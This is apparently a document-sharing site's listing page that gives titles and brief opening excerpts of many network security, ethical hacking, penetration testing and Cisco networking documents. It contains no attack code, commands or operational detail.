Sitefinity Security and Best Practices Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management

More information

CYBERTRON NETWORK SOLUTIONS

CYBERTRON NETWORK SOLUTIONS CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified

More information

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SY0-201. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users. From a high-level standpoint, attacks on computer systems and networks can be grouped

More information

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked. This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out

More information

Exploiting First Hop Protocols to Own the Network. Rocket City TakeDownCon 2015. Paul Coggin Senior Principal Cyber Security Analyst @PaulCoggin

Exploiting First Hop Protocols to Own the Network. Rocket City TakeDownCon 2015. Paul Coggin Senior Principal Cyber Security Analyst @PaulCoggin Exploiting First Hop Protocols to Own the Network Rocket City TakeDownCon 2015 Paul Coggin Senior Principal Cyber Security Analyst @PaulCoggin www.dynetics.com V## Goes Here 1 OSI and TCP/IP Model OSI

More information

Attacking Automatic Wireless Network Selection. Dino A. Dai Zovi and Shane A. Macaulay {ddaizovi,smacaulay1}@bloomberg.com

Attacking Automatic Wireless Network Selection. Dino A. Dai Zovi and Shane A. Macaulay {ddaizovi,smacaulay1}@bloomberg.com Attacking Automatic Wireless Network Selection Dino A. Dai Zovi and Shane A. Macaulay {ddaizovi,smacaulay1}@bloomberg.com We made Slashdot! Hackers, Meet Microsoft "The random chatter of several hundred

More information

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network

More information

SECURITY TRENDS & VULNERABILITIES REVIEW 2015

SECURITY TRENDS & VULNERABILITIES REVIEW 2015 SECURITY TRENDS & VULNERABILITIES REVIEW 2015 Contents 1. Introduction...3 2. Executive summary...4 3. Inputs...6 4. Statistics as of 2014. Comparative study of results obtained in 2013...7 4.1. Overall

More information

Professional Penetration Testing Techniques and Vulnerability Assessment ...

Professional Penetration Testing Techniques and Vulnerability Assessment ... Course Introduction Today Hackers are everywhere, if your corporate system connects to internet that means your system might be facing with hacker. This five days course Professional Vulnerability Assessment

More information

IP Link Best Practices for Network Integration and Security. Introduction...2. Passwords...4 ACL...5 VLAN...6. Protocols...6. Conclusion...

IP Link Best Practices for Network Integration and Security. Introduction...2. Passwords...4 ACL...5 VLAN...6. Protocols...6. Conclusion... IP Link Best Practices for Network Integration and Security Table of Contents Introduction...2 Passwords...4 ACL...5 VLAN...6 Protocols...6 Conclusion...9 Abstract Extron IP Link technology enables A/V

More information

Troubleshooting an Enterprise Network

Troubleshooting an Enterprise Network Troubleshooting an Enterprise Network Introducing Routing and Switching in the Enterprise Chapter 9 Released under Creative Commons License 3.0 By-Sa Cisco name, logo and materials are Copyright Cisco

More information

Thick Client Application Security

Thick Client Application Security Thick Client Application Security Arindam Mandal ([email protected]) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two

More information

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison

Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison CEHv8 vs CEHv7 CEHv7 CEHv8 19 Modules 20 Modules 90 Labs 110 Labs 1700 Slides 1770 Slides Updated information as per the latest developments with a proper flow Classroom friendly with diagrammatic representation

More information

2. From a control perspective, the PRIMARY objective of classifying information assets is to:

2. From a control perspective, the PRIMARY objective of classifying information assets is to: MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected

More information

GregSowell.com. Mikrotik Basics

GregSowell.com. Mikrotik Basics Mikrotik Basics Terms Used Layer X When I refer to something being at layer X I m referring to the OSI model. VLAN 802.1Q Layer 2 marking on traffic used to segment sets of traffic. VLAN tags are applied

More information

Catalyst Layer 3 Switch for Wake On LAN Support Across VLANs Configuration Example

Catalyst Layer 3 Switch for Wake On LAN Support Across VLANs Configuration Example Catalyst Layer 3 Switch for Wake On LAN Support Across VLANs Configuration Example Document ID: 91672 Contents Introduction Prerequisites Requirements Components Used Conventions Background Information

More information

CCNA Exploration: Accessing the WAN Chapter 7 Case Study

CCNA Exploration: Accessing the WAN Chapter 7 Case Study Objectives: Mitigate attacks based on DHCP rogue servers. Intro: ChurchBells Inc. is having connectivity issues and needs your help. The Scenario: According to the reports, some user PCs within the company

More information

Switching in an Enterprise Network

Switching in an Enterprise Network Switching in an Enterprise Network Introducing Routing and Switching in the Enterprise Chapter 3 Version 4.0 2006 Cisco Systems, Inc. All rights reserved. Cisco Public 1 Objectives Compare the types of

More information

Recommended IP Telephony Architecture

Recommended IP Telephony Architecture Report Number: I332-009R-2006 Recommended IP Telephony Architecture Systems and Network Attack Center (SNAC) Updated: 1 May 2006 Version 1.0 [email protected] This Page Intentionally Left Blank ii Warnings

More information

Implementing Cisco IOS Network Security

Implementing Cisco IOS Network Security Implementing Cisco IOS Network Security IINS v3.0; 5 Days, Instructor-led Course Description Implementing Cisco Network Security (IINS) v3.0 is a 5-day instructor-led course focusing on security principles

More information

Security Technology White Paper

Security Technology White Paper Security Technology White Paper Issue 01 Date 2012-10-30 HUAWEI TECHNOLOGIES CO., LTD. 2012. All rights reserved. No part of this document may be reproduced or transmitted in any form or by any means without

More information

Information Security Services

Information Security Services Information Security Services Information Security In 2013, Symantec reported a 62% increase in data breaches over 2012. These data breaches had tremendous impacts on many companies, resulting in intellectual

More information

BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note

BlackBerry Enterprise Service 10. Secure Work Space for ios and Android Version: 10.1.1. Security Note BlackBerry Enterprise Service 10 Secure Work Space for ios and Android Version: 10.1.1 Security Note Published: 2013-06-21 SWD-20130621110651069 Contents 1 About this guide...4 2 What is BlackBerry Enterprise

More information

My FreeScan Vulnerabilities Report

My FreeScan Vulnerabilities Report Page 1 of 6 My FreeScan Vulnerabilities Report Print Help For 66.40.6.179 on Feb 07, 008 Thank you for trying FreeScan. Below you'll find the complete results of your scan, including whether or not the

More information

Secure Networks for Process Control

Secure Networks for Process Control Secure Networks for Process Control Leveraging a Simple Yet Effective Policy Framework to Secure the Modern Process Control Network An Enterasys Networks White Paper There is nothing more important than

More information

The Risks that Pen Tests don t Find. OWASP 13 April 2012. The OWASP Foundation http://www.owasp.org

The Risks that Pen Tests don t Find. OWASP 13 April 2012. The OWASP Foundation http://www.owasp.org The Risks that Pen Tests don t Find 13 April 2012 Gary Gaskell Infosec Services [email protected] 0438 603 307 Copyright The Foundation Permission is granted to copy, distribute and/or modify

More information

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:

More information

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange

More information

Configure IOS Catalyst Switches to Connect Cisco IP Phones Configuration Example

Configure IOS Catalyst Switches to Connect Cisco IP Phones Configuration Example Configure IOS Catalyst Switches to Connect Cisco IP Phones Configuration Example Document ID: 69632 Introduction Prerequisites Requirements Components Used Conventions Background Information Configure

More information

Top-Down Network Design

Top-Down Network Design Top-Down Network Design Chapter Five Designing a Network Topology Copyright 2010 Cisco Press & Priscilla Oppenheimer Topology A map of an internetwork that indicates network segments, interconnection points,

More information

Security of IPv6 and DNSSEC for penetration testers

Security of IPv6 and DNSSEC for penetration testers Security of IPv6 and DNSSEC for penetration testers Vesselin Hadjitodorov Master education System and Network Engineering June 30, 2011 Agenda Introduction DNSSEC security IPv6 security Conclusion Questions

More information

Course Overview: Learn the essential skills needed to set up, configure, support, and troubleshoot your TCP/IP-based network.

Course Overview: Learn the essential skills needed to set up, configure, support, and troubleshoot your TCP/IP-based network. Course Name: TCP/IP Networking Course Overview: Learn the essential skills needed to set up, configure, support, and troubleshoot your TCP/IP-based network. TCP/IP is the globally accepted group of protocols

More information

Learn Ethical Hacking, Become a Pentester

Learn Ethical Hacking, Become a Pentester Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,

More information

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions

Security Awareness For Server Administrators. State of Illinois Central Management Services Security and Compliance Solutions Security Awareness For Server Administrators State of Illinois Central Management Services Security and Compliance Solutions Purpose and Scope To present a best practice approach to securing your servers

More information

Footprinting and Reconnaissance Tools

Footprinting and Reconnaissance Tools Footprinting and Reconnaissance Tools Topic 1: Common Port Scanning Techniques Do some research on computer ports that are most often scanned by hackers. Identify a port scanning exploit that is interesting

More information

Penetration Test Report

Penetration Test Report Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787

More information

Solutions for LAN Protection

Solutions for LAN Protection Solutions Guide Solutions for LAN Protection Allied Telesis security features safeguard networks and mitigate attacks Introduction The increasing number of connected devices in today s networks has created

More information

9 Simple steps to secure your Wi-Fi Network.

9 Simple steps to secure your Wi-Fi Network. 9 Simple steps to secure your Wi-Fi Network. Step 1: Change the Default Password of Modem / Router After opening modem page click on management - access control password. Select username, confirm old password

More information

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours

Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours Windows Client/Server Local Area Network (LAN) System Security Lab 2 Time allocation 3 hours Introduction The following lab allows the trainee to obtain a more in depth knowledge of network security and

More information

Introduction on Low level Network tools

Introduction on Low level Network tools Georges Da Costa [email protected] http: //www.irit.fr/~georges.da-costa/cours/addis/ 1 Introduction 2 Aircrack-ng 3 Wireshark Low level tools Hacking tools Aircrack-ng (ex Aircrack, ex Airsnort) WEP/WPA

More information

Interconnecting Cisco Networking Devices Part 2

Interconnecting Cisco Networking Devices Part 2 Interconnecting Cisco Networking Devices Part 2 Course Number: ICND2 Length: 5 Day(s) Certification Exam This course will help you prepare for the following exam: 640 816: ICND2 Course Overview This course

More information

ACADEMIA LOCAL CISCO UCV-MARACAY CONTENIDO DE CURSO CURRICULUM CCNA. SEGURIDAD SEGURIDAD EN REDES. NIVEL I. VERSION 2.0

ACADEMIA LOCAL CISCO UCV-MARACAY CONTENIDO DE CURSO CURRICULUM CCNA. SEGURIDAD SEGURIDAD EN REDES. NIVEL I. VERSION 2.0 ACADEMIA LOCAL CISCO UCV-MARACAY CONTENIDO DE CURSO CURRICULUM CCNA. SEGURIDAD SEGURIDAD EN REDES. NIVEL I. VERSION 2.0 Module 1: Vulnerabilities, Threats, and Attacks 1.1 Introduction to Network Security

More information

Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours

Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours Ethical Hacking and Information Security Duration Detailed Module Foundation of Information Security Lecture with Hands On Session: 90 Hours Elements of Information Security Introduction As technology

More information

Linux Network Security

Linux Network Security Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols

More information

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London

More information

Own your LAN with Arp Poison Routing

Own your LAN with Arp Poison Routing Own your LAN with Arp Poison Routing By: Rorik Koster April 17, 2006 Security is a popular buzzword heard every day throughout our American culture and possibly even more so in our global economy. From

More information

Cisco Certified Network Associate Exam. Operation of IP Data Networks. LAN Switching Technologies. IP addressing (IPv4 / IPv6)

Cisco Certified Network Associate Exam. Operation of IP Data Networks. LAN Switching Technologies. IP addressing (IPv4 / IPv6) Cisco Certified Network Associate Exam Exam Number 200-120 CCNA Associated Certifications CCNA Routing and Switching Operation of IP Data Networks Operation of IP Data Networks Recognize the purpose and

More information

A Decision Maker s Guide to Securing an IT Infrastructure

A Decision Maker s Guide to Securing an IT Infrastructure A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose

More information

100-101: Interconnecting Cisco Networking Devices Part 1 v2.0 (ICND1)

100-101: Interconnecting Cisco Networking Devices Part 1 v2.0 (ICND1) 100-101: Interconnecting Cisco Networking Devices Part 1 v2.0 (ICND1) Course Overview This course provides students with the knowledge and skills to implement and support a small switched and routed network.

More information

Automated Penetration Test

Automated Penetration Test Automated Penetration Test TABLE OF CONTENTS Introduction.... 2 Test Structure.... 2 Manually Launching The Automated Penetration Test.... 3 Automatically Launching The Automated Penetration Test On Boot....

More information

CMPT 471 Networking II

CMPT 471 Networking II CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access

More information

CHAPTER 6 DESIGNING A NETWORK TOPOLOGY

CHAPTER 6 DESIGNING A NETWORK TOPOLOGY CHAPTER 6 DESIGNING A NETWORK TOPOLOGY Expected Outcomes Able to identify terminology that will help student discuss technical goals with customer. Able to introduce a checklist that can be used to determine

More information

Intrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks

Intrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks Intrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks Dale Peterson Director, Network Security Practice Digital Bond, Inc. 1580 Sawgrass Corporate Parkway, Suite 130 Sunrise, FL 33323

More information

iscsi Security (Insecure SCSI) Presenter: Himanshu Dwivedi

iscsi Security (Insecure SCSI) Presenter: Himanshu Dwivedi iscsi Security (Insecure SCSI) Presenter: Himanshu Dwivedi Agenda Introduction iscsi Attacks Enumeration Authorization Authentication iscsi Defenses Information Security Partners (isec) isec Partners Independent

More information

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS 1 LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS Te-Shun Chou and Tijjani Mohammed Department of Technology Systems East Carolina University [email protected] Abstract

More information

Security Considerations in IP Telephony Network Configuration

Security Considerations in IP Telephony Network Configuration Security Considerations in IP Telephony Network Configuration Abstract This Technical Report deals with fundamental security settings in networks to provide secure VoIP services. Example configurations

More information

Security Awareness. Wireless Network Security

Security Awareness. Wireless Network Security Security Awareness Wireless Network Security Attacks on Wireless Networks Three-step process Discovering the wireless network Connecting to the network Launching assaults Security Awareness, 3 rd Edition

More information

86-10-15 The Self-Hack Audit Stephen James Payoff

86-10-15 The Self-Hack Audit Stephen James Payoff 86-10-15 The Self-Hack Audit Stephen James Payoff As organizations continue to link their internal networks to the Internet, system managers and administrators are becoming increasingly aware of the need

More information

External Network Penetration Test Report

External Network Penetration Test Report External Network Penetration Test Report Jared Doe [email protected] C O N F I D E N T I A L P a g e 2 Document Information Assessment Information Assessor Kirit Gupta [email protected]

More information

8 steps to protect your Cisco router

8 steps to protect your Cisco router 8 steps to protect your Cisco router Daniel B. Cid [email protected] Network security is a completely changing area; new devices like IDS (Intrusion Detection systems), IPS (Intrusion Prevention

More information

Network Access Security. Lesson 10

Network Access Security. Lesson 10 Network Access Security Lesson 10 Objectives Exam Objective Matrix Technology Skill Covered Exam Objective Exam Objective Number Firewalls Given a scenario, install and configure routers and switches.

More information

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder. CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files

More information

Ethical Hacking as a Professional Penetration Testing Technique

Ethical Hacking as a Professional Penetration Testing Technique Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996

More information

Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials.

Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials. Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials. CHAPTER 5 OBJECTIVES Configure a router with an initial configuration. Use the

More information

CS5008: Internet Computing

CS5008: Internet Computing CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is

More information

Windows Operating Systems. Basic Security

Windows Operating Systems. Basic Security Windows Operating Systems Basic Security Objectives Explain Windows Operating System (OS) common configurations Recognize OS related threats Apply major steps in securing the OS Windows Operating System

More information

Penetration Testing Walkthrough

Penetration Testing Walkthrough Penetration Testing Walkthrough Table of Contents Penetration Testing Walkthrough... 3 Practical Walkthrough of Phases 2-5... 4 Chose Tool BackTrack (Armitage)... 5 Choose Target... 6 Phase 2 - Basic Scan...

More information

- Basic Router Security -

- Basic Router Security - 1 Enable Passwords - Basic Router Security - The enable password protects a router s Privileged mode. This password can be set or changed from Global Configuration mode: Router(config)# enable password

More information

Information Security. Training

Information Security. Training Information Security Training Importance of Information Security Training There is only one way to keep your product plans safe and that is by having a trained, aware and a conscientious workforce. - Kevin

More information

Network Security. Network Packet Analysis

Network Security. Network Packet Analysis Network Security Network Packet Analysis Module 3 Keith A. Watson, CISSP, CISA IA Research Engineer, CERIAS [email protected] 1 Network Packet Analysis Definition: Examining network packets to determine

More information

Wireless Networks. Welcome to Wireless

Wireless Networks. Welcome to Wireless Wireless Networks 11/1/2010 Wireless Networks 1 Welcome to Wireless Radio waves No need to be physically plugged into the network Remote access Coverage Personal Area Network (PAN) Local Area Network (LAN)

More information

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young

ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction

More information

Network Traffic Analysis

Network Traffic Analysis 2013 Network Traffic Analysis Gerben Kleijn and Terence Nicholls 6/21/2013 Contents Introduction... 3 Lab 1 - Installing the Operating System (OS)... 3 Lab 2 Working with TCPDump... 4 Lab 3 - Installing

More information

Chapter 2 Reading Organizer

Chapter 2 Reading Organizer Chapter 2 Reading Organizer After completion of this chapter, you should be able to: Explain the advantages and disadvantages of static routing Configure initial settings on a Cisco switch Configure switch

More information

Wireless Local Area Networks (WLANs)

Wireless Local Area Networks (WLANs) 4 Wireless Local Area Networks (WLANs) Contents Overview...................................................... 4-3 Configuration Options: Normal Versus Advanced Mode.............. 4-4 Normal Mode Configuration..................................

More information

INFORMATION SECURITY TRAINING CATALOG (2015)

INFORMATION SECURITY TRAINING CATALOG (2015) INFORMATICS AND INFORMATION SECURITY RESEARCH CENTER CYBER SECURITY INSTITUTE INFORMATION SECURITY TRAINING CATALOG (2015) Revision 3.0 2015 TÜBİTAK BİLGEM SGE Siber Güvenlik Enstitüsü P.K. 74, Gebze,

More information

Building A Secure Microsoft Exchange Continuity Appliance

Building A Secure Microsoft Exchange Continuity Appliance Building A Secure Microsoft Exchange Continuity Appliance Teneros, Inc. 215 Castro Street, 3rd Floor Mountain View, California 94041-1203 USA p 650.641.7400 f 650.641.7401 ON AVAILABLE ACCESSIBLE Building

More information

Symantec Endpoint Protection 11.0 Network Threat Protection (Firewall) Overview and Best Practices White Paper

Symantec Endpoint Protection 11.0 Network Threat Protection (Firewall) Overview and Best Practices White Paper Symantec Endpoint Protection 11.0 Network Threat Protection (Firewall) Overview and Best Practices White Paper Details: Introduction When computers in a private network connect to the Internet, they physically

More information

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection.

A host-based firewall can be used in addition to a network-based firewall to provide multiple layers of protection. A firewall is a software- or hardware-based network security system that allows or denies network traffic according to a set of rules. Firewalls can be categorized by their location on the network: A network-based

More information

Steps for Basic Configuration

Steps for Basic Configuration 1. This guide describes how to use the Unified Threat Management appliance (UTM) Basic Setup Wizard to configure the UTM for connection to your network. It also describes how to register the UTM with NETGEAR.

More information

Understanding Security Testing

Understanding Security Testing Understanding Security Testing Choosing between vulnerability assessments and penetration testing need not be confusing or onerous. Arian Eigen Heald, M.A., Ms.IA., CNE, CISA, CISSP I. Introduction Many

More information